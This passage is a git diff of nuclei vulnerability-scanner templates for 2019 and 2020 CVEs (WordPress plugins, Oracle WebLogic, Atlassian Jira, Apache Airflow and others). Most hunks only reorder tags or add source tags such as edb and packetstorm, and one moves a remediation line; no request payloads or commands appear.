cve,cve2019,strapi,auth-bypass,intrusive + tags: cve2019,strapi,auth-bypass,intrusive,edb,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-18922.yaml b/config/nuclei-templates/cves/2019/CVE-2019-18922.yaml index 678a3f43d..48d53d59c 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-18922.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-18922.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18922 cwe-id: CWE-22 - tags: cve,cve2019,allied,lfi + tags: allied,lfi,packetstorm,cve,cve2019 requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-19134.yaml b/config/nuclei-templates/cves/2019/CVE-2019-19134.yaml index df9423273..ac96619ee 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-19134.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-19134.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-19134 cwe-id: CWE-79 - tags: cve,cve2019,wordpress,xss,wp-plugin,maps + tags: wpscan,cve,cve2019,wordpress,xss,wp-plugin,maps requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-19368.yaml b/config/nuclei-templates/cves/2019/CVE-2019-19368.yaml index 135ab472f..f53a437d0 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-19368.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-19368.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-19368 cwe-id: CWE-79 - tags: cve,cve2019,xss,ftp + tags: xss,ftp,packetstorm,cve,cve2019 requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-19985.yaml b/config/nuclei-templates/cves/2019/CVE-2019-19985.yaml index 55d64cf2b..c7642d2f8 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-19985.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-19985.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2019-19985 cwe-id: CWE-862 - tags: cve,cve2019,wordpress,wp-plugin + tags: cve2019,wordpress,wp-plugin,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-20085.yaml b/config/nuclei-templates/cves/2019/CVE-2019-20085.yaml index 017846d59..5602b9547 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-20085.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-20085.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-20085 cwe-id: CWE-22 - tags: cve,cve2019,iot,lfi,kev + tags: cve,cve2019,iot,lfi,kev,edb,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-20183.yaml b/config/nuclei-templates/cves/2019/CVE-2019-20183.yaml index 07b8b667c..545f1165b 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-20183.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-20183.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.2 cve-id: CVE-2019-20183 cwe-id: CWE-434 - tags: cve,cve2019,rce,intrusive,upload + tags: upload,edb,cve,cve2019,rce,intrusive requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-20210.yaml b/config/nuclei-templates/cves/2019/CVE-2019-20210.yaml index 82e2e321a..8e86b8402 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-20210.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-20210.yaml @@ -16,7 +16,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-20210 cwe-id: CWE-79 - tags: cve,cve2019,wordpress,citybook,xss,wp-theme + tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-2616.yaml b/config/nuclei-templates/cves/2019/CVE-2019-2616.yaml index 9d58ff8ce..3197c7565 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-2616.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-2616.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2616 - tags: cve,cve2019,oracle,xxe,oast,kev + tags: cve,cve2019,oracle,xxe,oast,kev,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-2725.yaml b/config/nuclei-templates/cves/2019/CVE-2019-2725.yaml index daf8c5d73..9e912928f 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-2725.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-2725.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-2725 cwe-id: CWE-74 - tags: cve,cve2019,oracle,weblogic,rce,kev + tags: kev,edb,cve,cve2019,oracle,weblogic,rce requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-2767.yaml b/config/nuclei-templates/cves/2019/CVE-2019-2767.yaml index 7c3015042..0d3b97de4 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-2767.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-2767.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2767 - tags: cve,cve2019,oracle,xxe,oast + tags: edb,cve,cve2019,oracle,xxe,oast requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-3396.yaml b/config/nuclei-templates/cves/2019/CVE-2019-3396.yaml index e5f469295..cda743ac1 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-3396.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-3396.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-22 metadata: shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2019,atlassian,confluence,lfi,rce,kev + tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-3911.yaml b/config/nuclei-templates/cves/2019/CVE-2019-3911.yaml index ba2a73a67..9ccfc5e72 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-3911.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-3911.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: 'Server: Labkey' - tags: cve,cve2019,xss,labkey + tags: cve,cve2019,xss,labkey,tenable requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-3912.yaml b/config/nuclei-templates/cves/2019/CVE-2019-3912.yaml index 48ffb51ea..26ddc2eb9 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-3912.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-3912.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-601 metadata: shodan-query: 'Server: Labkey' - tags: cve,cve2019,redirect,labkey + tags: tenable,cve,cve2019,redirect,labkey requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-3929.yaml b/config/nuclei-templates/cves/2019/CVE-2019-3929.yaml index 213dd6327..1de3aa3ef 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-3929.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-3929.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-3929 cwe-id: CWE-78 - tags: rce,cve,cve2019,oast,injection,kev + tags: tenable,cve,cve2019,oast,injection,kev,edb,rce,packetstorm requests: - method: POST diff --git a/config/nuclei-templates/cves/2019/CVE-2019-5418.yaml b/config/nuclei-templates/cves/2019/CVE-2019-5418.yaml index 8313d1a86..c6bddb1a8 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-5418.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-5418.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-5418 - tags: cve,cve2019,rails,lfi,disclosure + tags: cve,cve2019,rails,lfi,disclosure,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-6715.yaml b/config/nuclei-templates/cves/2019/CVE-2019-6715.yaml index bb10c6d96..2db45b9db 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-6715.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-6715.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-6715 - tags: cve,cve2019,wordpress,wp-plugin,ssrf + tags: cve,cve2019,wordpress,wp-plugin,ssrf,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-7254.yaml b/config/nuclei-templates/cves/2019/CVE-2019-7254.yaml index 5a2ae37b9..84945b550 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-7254.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-7254.yaml @@ -16,7 +16,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7254 cwe-id: CWE-22 - tags: cve,cve2019,emerge,lfi + tags: emerge,lfi,edb,packetstorm,cve,cve2019 requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-7256.yaml b/config/nuclei-templates/cves/2019/CVE-2019-7256.yaml index dbfdb7a0e..c7f231221 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-7256.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-7256.yaml @@ -15,7 +15,7 @@ info: cvss-score: 10 cve-id: CVE-2019-7256 cwe-id: CWE-78 - tags: cve,cve2019,emerge,rce + tags: cve,cve2019,emerge,rce,edb requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-7275.yaml b/config/nuclei-templates/cves/2019/CVE-2019-7275.yaml index c865445f3..4f0604520 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-7275.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-7275.yaml @@ -15,7 +15,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-7275 cwe-id: CWE-601 - tags: cve,cve2019,redirect + tags: cve,cve2019,redirect,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-8449.yaml b/config/nuclei-templates/cves/2019/CVE-2019-8449.yaml index 567f28908..162a8a0ff 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-8449.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-8449.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-306 metadata: shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2019,atlassian,jira,disclosure + tags: atlassian,jira,disclosure,packetstorm,cve,cve2019 requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-8451.yaml b/config/nuclei-templates/cves/2019/CVE-2019-8451.yaml index fd75e371e..df4392692 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-8451.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-8451.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-918 metadata: shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2019,atlassian,jira,ssrf,oast + tags: atlassian,jira,ssrf,oast,tenable,hackerone,cve,cve2019 requests: - method: POST diff --git a/config/nuclei-templates/cves/2019/CVE-2019-8937.yaml b/config/nuclei-templates/cves/2019/CVE-2019-8937.yaml index b3e4c0e50..8e8563028 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-8937.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-8937.yaml @@ -17,7 +17,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-8937 cwe-id: CWE-79 - tags: cve,cve2019,xss,hoteldruid + tags: packetstorm,cve,cve2019,xss,hoteldruid,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-8982.yaml b/config/nuclei-templates/cves/2019/CVE-2019-8982.yaml index abd568261..607a1aea0 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-8982.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-8982.yaml @@ -13,7 +13,7 @@ info: cvss-score: 9.6 cve-id: CVE-2019-8982 cwe-id: CWE-918 - tags: cve,cve2019,wavemaker,lfi,ssrf + tags: cve,cve2019,wavemaker,lfi,ssrf,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-9041.yaml b/config/nuclei-templates/cves/2019/CVE-2019-9041.yaml index 0c5f3991c..71298e449 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-9041.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-9041.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.2 cve-id: CVE-2019-9041 cwe-id: CWE-917 - tags: cve,cve2019,zzzcms,rce + tags: cve,cve2019,zzzcms,rce,edb requests: - method: POST diff --git a/config/nuclei-templates/cves/2019/CVE-2019-9618.yaml b/config/nuclei-templates/cves/2019/CVE-2019-9618.yaml index d2563f9e2..3849fff45 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-9618.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-9618.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9618 cwe-id: CWE-22 - tags: cve,cve2019,wordpress,wp-plugin,lfi + tags: wordpress,wp-plugin,lfi,seclists,edb,cve,cve2019 requests: - method: GET diff --git a/config/nuclei-templates/cves/2019/CVE-2019-9670.yaml b/config/nuclei-templates/cves/2019/CVE-2019-9670.yaml index 75332ed7c..3f0d4ec28 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-9670.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-9670.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9670 cwe-id: CWE-611 - tags: cve,cve2019,zimbra,xxe,kev + tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-9733.yaml b/config/nuclei-templates/cves/2019/CVE-2019-9733.yaml index 15cb9c783..51553da5a 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-9733.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-9733.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-9733 - tags: cve,cve2019,artifactory,login + tags: packetstorm,cve,cve2019,artifactory,login requests: - raw: diff --git a/config/nuclei-templates/cves/2019/CVE-2019-9955.yaml b/config/nuclei-templates/cves/2019/CVE-2019-9955.yaml index 7489a0c82..ae8a3af37 100644 --- a/config/nuclei-templates/cves/2019/CVE-2019-9955.yaml +++ b/config/nuclei-templates/cves/2019/CVE-2019-9955.yaml @@ -17,7 +17,7 @@ info: cvss-score: 6.1 cve-id: CVE-2019-9955 cwe-id: CWE-79 - tags: cve,cve2019,xss,zyxel + tags: zyxel,packetstorm,seclists,edb,cve,cve2019,xss requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-0618.yaml b/config/nuclei-templates/cves/2020/CVE-2020-0618.yaml index bb1ae5e03..459f23014 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-0618.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-0618.yaml @@ -16,7 +16,7 @@ info: cvss-score: 8.8 cve-id: CVE-2020-0618 cwe-id: CWE-502 - tags: cve,cve2020,rce + tags: cve2020,rce,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-10770.yaml b/config/nuclei-templates/cves/2020/CVE-2020-10770.yaml index 36b948f44..a06562e74 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-10770.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-10770.yaml @@ -15,7 +15,7 @@ info: cvss-score: 5.3 cve-id: CVE-2020-10770 cwe-id: CWE-601 - tags: keycloak,ssrf,oast,cve,cve2020,blind + tags: keycloak,ssrf,oast,cve,cve2020,blind,packetstorm,edb requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-11455.yaml b/config/nuclei-templates/cves/2020/CVE-2020-11455.yaml index 5f8cd7fa1..3144ec60f 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-11455.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-11455.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11455 cwe-id: CWE-22 - tags: cve,cve2020,lfi + tags: cve2020,lfi,edb,packetstorm,cve requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-11738.yaml b/config/nuclei-templates/cves/2020/CVE-2020-11738.yaml index 4bfef355a..09b17883e 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-11738.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-11738.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-11738 cwe-id: CWE-22 - tags: cve,cve2020,wordpress,wp-plugin,lfi,kev + tags: kev,tenable,packetstorm,cve,cve2020,wordpress,wp-plugin,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-11853.yaml b/config/nuclei-templates/cves/2020/CVE-2020-11853.yaml index 136b886a9..d97b164e6 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-11853.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-11853.yaml @@ -16,7 +16,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-11853 - tags: cve,cve2020,opm,rce + tags: opm,rce,packetstorm,cve,cve2020 requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-11854.yaml b/config/nuclei-templates/cves/2020/CVE-2020-11854.yaml index ee377b4cd..acc7fb772 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-11854.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-11854.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-11854 cwe-id: CWE-798 - tags: cve,cve2020,ucmdb,rce,microfocus + tags: microfocus,packetstorm,cve,cve2020,ucmdb,rce requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-11930.yaml b/config/nuclei-templates/cves/2020/CVE-2020-11930.yaml index 6db2a9447..c8eafd2fa 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-11930.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-11930.yaml @@ -16,7 +16,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-11930 cwe-id: CWE-79 - tags: cve,cve2020,wordpress,xss,plugin + tags: cve,cve2020,wordpress,xss,plugin,wpscan requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-11978.yaml b/config/nuclei-templates/cves/2020/CVE-2020-11978.yaml index 29a2e9314..7bbc89cdb 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-11978.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-11978.yaml @@ -5,12 +5,12 @@ info: author: pdteam severity: high description: Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). - remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. reference: - /~https://github.com/pberba/CVE-2020-11978 - https://twitter.com/wugeej/status/1400336603604668418 - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 diff --git a/config/nuclei-templates/cves/2020/CVE-2020-12054.yaml b/config/nuclei-templates/cves/2020/CVE-2020-12054.yaml index dfbd7c657..dfc39ddb1 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-12054.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-12054.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-12054 cwe-id: CWE-79 - tags: cve,cve2020,wordpress,xss,wp-plugin + tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020 requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-12720.yaml b/config/nuclei-templates/cves/2020/CVE-2020-12720.yaml index 952c06d4c..429e6fef8 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-12720.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-12720.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12720 cwe-id: CWE-89,CWE-306 - tags: cve,cve2020,vbulletin,sqli + tags: cve2020,vbulletin,sqli,packetstorm,cve requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-12800.yaml b/config/nuclei-templates/cves/2020/CVE-2020-12800.yaml index 78797b30f..ecbf0b81b 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-12800.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-12800.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12800 cwe-id: CWE-434 - tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce + tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020 requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-13927.yaml b/config/nuclei-templates/cves/2020/CVE-2020-13927.yaml index 06edead8a..8857b7131 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-13927.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-13927.yaml @@ -20,7 +20,7 @@ info: metadata: verified: true shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" - tags: cve,cve2020,apache,airflow,unauth,auth-bypass,kev + tags: packetstorm,cve,cve2020,apache,airflow,unauth,auth-bypass,kev requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-13945.yaml b/config/nuclei-templates/cves/2020/CVE-2020-13945.yaml index 6c740884d..3f96e2b96 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-13945.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-13945.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-13945 - tags: cve,cve2020,apache,apisix,rce,intrusive + tags: rce,intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-14092.yaml b/config/nuclei-templates/cves/2020/CVE-2020-14092.yaml index 12a18bb82..89bcafe29 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-14092.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-14092.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-14092 cwe-id: CWE-89 - tags: cve,cve2020,wordpress,wp-plugin,sqli,paypal + tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-14181.yaml b/config/nuclei-templates/cves/2020/CVE-2020-14181.yaml index 5cb2590be..03c15852b 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-14181.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-14181.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-200 metadata: shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2020,atlassian,jira + tags: cve,cve2020,atlassian,jira,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-14864.yaml b/config/nuclei-templates/cves/2020/CVE-2020-14864.yaml index 2b65b0417..dc197994c 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-14864.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-14864.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-14864 - tags: cve,cve2020,oracle,lfi,kev + tags: cve,cve2020,oracle,lfi,kev,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-14883.yaml b/config/nuclei-templates/cves/2020/CVE-2020-14883.yaml index 6cfd6b61c..bee6ab626 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-14883.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-14883.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-14883 - tags: cve,cve2020,oracle,rce,weblogic,kev + tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020 requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-15050.yaml b/config/nuclei-templates/cves/2020/CVE-2020-15050.yaml index 000a915b6..141a14c32 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-15050.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-15050.yaml @@ -14,7 +14,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-15050 cwe-id: CWE-22 - tags: cve,cve2020,lfi,suprema,biostar2 + tags: suprema,biostar2,packetstorm,cve,cve2020,lfi requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-15500.yaml b/config/nuclei-templates/cves/2020/CVE-2020-15500.yaml index 92eff6fe4..f28fdc107 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-15500.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-15500.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-15500 cwe-id: CWE-79 - tags: cve,cve2020,xss,tileserver + tags: cve,cve2020,xss,tileserver,packetstorm requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-15920.yaml b/config/nuclei-templates/cves/2020/CVE-2020-15920.yaml index 24842d818..fe5fa2196 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-15920.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-15920.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15920 cwe-id: CWE-78 - tags: cve,cve2020,mida,rce + tags: cve,cve2020,mida,rce,packetstorm requests: - method: POST diff --git a/config/nuclei-templates/cves/2020/CVE-2020-16139.yaml b/config/nuclei-templates/cves/2020/CVE-2020-16139.yaml index 95a74a78f..cf5468f60 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-16139.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-16139.yaml @@ -16,7 +16,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-16139 - tags: cve,cve2020,dos,cisco + tags: cve,cve2020,dos,cisco,packetstorm requests: - raw: diff --git a/config/nuclei-templates/cves/2020/CVE-2020-16846.yaml b/config/nuclei-templates/cves/2020/CVE-2020-16846.yaml index 32f4f7211..811487235 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-16846.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-16846.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-16846 cwe-id: CWE-78 - tags: cve,cve2020,saltstack,kev + tags: vulhub,cve,cve2020,saltstack,kev requests: - method: POST diff --git a/config/nuclei-templates/cves/2020/CVE-2020-16952.yaml b/config/nuclei-templates/cves/2020/CVE-2020-16952.yaml index ed099d102..314af66e9 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-16952.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-16952.yaml @@ -15,7 +15,7 @@ info: cvss-score: 7.8 cve-id: CVE-2020-16952 cwe-id: CWE-346 - tags: cve,cve2020,sharepoint,iis,microsoft,ssi,rce + tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-17362.yaml b/config/nuclei-templates/cves/2020/CVE-2020-17362.yaml index 9e3d6f407..47dd6f957 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-17362.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-17362.yaml @@ -14,7 +14,7 @@ info: cvss-score: 6.1 cve-id: CVE-2020-17362 cwe-id: CWE-79 - tags: cve,cve2020,wordpress,xss,wp-plugin + tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020 requests: - method: GET diff --git a/config/nuclei-templates/cves/2020/CVE-2020-17456.yaml b/config/nuclei-templates/cves/2020/CVE-2020-17456.yaml index 7e4d3b54b..fba91c11a 100644 --- a/config/nuclei-templates/cves/2020/CVE-2020-17456.yaml +++ b/config/nuclei-templates/cves/2020/CVE-2020-17456.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 - tags: rce,seowon,router,unauth,iot,cve,cve2020,oast + tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve requests: - raw: diff --git 